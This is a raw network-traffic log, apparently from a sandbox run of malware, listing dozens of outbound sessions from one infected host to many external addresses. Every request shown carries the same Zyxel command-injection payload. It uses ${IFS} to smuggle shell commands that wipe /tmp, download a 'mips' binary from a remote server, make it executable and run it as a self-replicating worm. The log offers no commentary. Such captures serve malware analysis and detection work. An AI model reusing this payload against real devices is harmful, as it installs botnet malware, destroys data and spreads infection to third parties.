                              Mar 31, 2024 08:41:24.805649996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3988192.168.2.1351040155.99.67.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805696964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3989192.168.2.1355748192.81.202.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805720091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3990192.168.2.133763842.16.131.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805748940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3991192.168.2.1346828141.158.173.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805787086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3992192.168.2.1339246131.0.62.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805814981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3993192.168.2.135049640.173.131.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805845022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3994192.168.2.13471204.5.182.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805861950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3995192.168.2.136002674.63.74.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805924892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3996192.168.2.133461499.128.195.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805962086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3997192.168.2.134995070.23.61.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.805984020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3998192.168.2.134555869.214.6.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806050062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3999192.168.2.135149439.167.59.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806065083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4000192.168.2.1353526205.108.151.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806092978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4001192.168.2.1334282168.96.76.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806094885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4002192.168.2.1336014162.88.247.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806168079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4003192.168.2.1346898187.184.127.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806216002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4004192.168.2.133587452.41.131.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806241035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4005192.168.2.1344786136.95.164.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806262970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4006192.168.2.133793631.88.249.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806349993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4007192.168.2.1336084164.246.38.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806366920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4008192.168.2.135104291.122.46.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806391954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4009192.168.2.134786827.27.124.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806421995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4010192.168.2.13411982.38.61.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806454897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4011192.168.2.136017694.46.156.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806493044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4012192.168.2.1349114142.80.178.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806529045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4013192.168.2.1334318150.165.175.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806555986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4014192.168.2.133583272.115.113.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806621075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4015192.168.2.135696292.144.173.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806627989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4016192.168.2.1347352107.165.180.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806687117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4017192.168.2.1349962154.253.49.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806725979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4018192.168.2.1348236146.56.109.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806761026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4019192.168.2.136048291.118.125.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806790113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4020192.168.2.134433254.45.50.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806833982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4021192.168.2.1342958139.138.90.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806849957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4022192.168.2.135403820.23.156.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806893110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4023192.168.2.135498034.243.31.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806915998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4024192.168.2.133852869.210.169.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806946993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4025192.168.2.135241074.134.49.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.806981087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4026192.168.2.1340834107.176.24.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807003975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4027192.168.2.1334954196.174.118.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807059050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4028192.168.2.133284892.139.212.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807094097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4029192.168.2.1345336221.255.58.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807146072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4030192.168.2.1339914210.28.199.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807167053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4031192.168.2.135326048.101.254.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807199955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4032192.168.2.135406482.30.224.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807224035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4033192.168.2.134463295.47.251.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807267904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4034192.168.2.1351984112.121.196.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807301998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4035192.168.2.1352956197.180.155.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807358980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4036192.168.2.1337188158.246.140.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807389021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4037192.168.2.1340312162.30.191.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807426929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4038192.168.2.1341170124.88.216.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807446003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4039192.168.2.1338876154.172.60.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807486057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4040192.168.2.135223243.171.213.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807533979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4041192.168.2.1355774132.96.128.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807564974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4042192.168.2.1349242221.27.122.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807593107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4043192.168.2.1342548171.119.207.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807635069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4044192.168.2.1345552126.24.248.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807646036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4045192.168.2.134250098.29.220.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807713985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4046192.168.2.134876068.67.254.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807754993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4047192.168.2.1350292217.251.13.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807780981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4048192.168.2.1343200107.248.178.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807815075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4049192.168.2.134503067.50.253.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807830095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4050192.168.2.1350254107.201.148.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807876110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4051192.168.2.1360598115.29.47.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807881117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4052192.168.2.1345510161.5.117.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807945013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4053192.168.2.1351632158.230.219.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807955980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4054192.168.2.1353458167.56.128.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.807984114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4055192.168.2.1347904116.255.208.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:24.808012962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4056192.168.2.135336074.216.165.15443
                              TimestampBytes transferredDirectionData
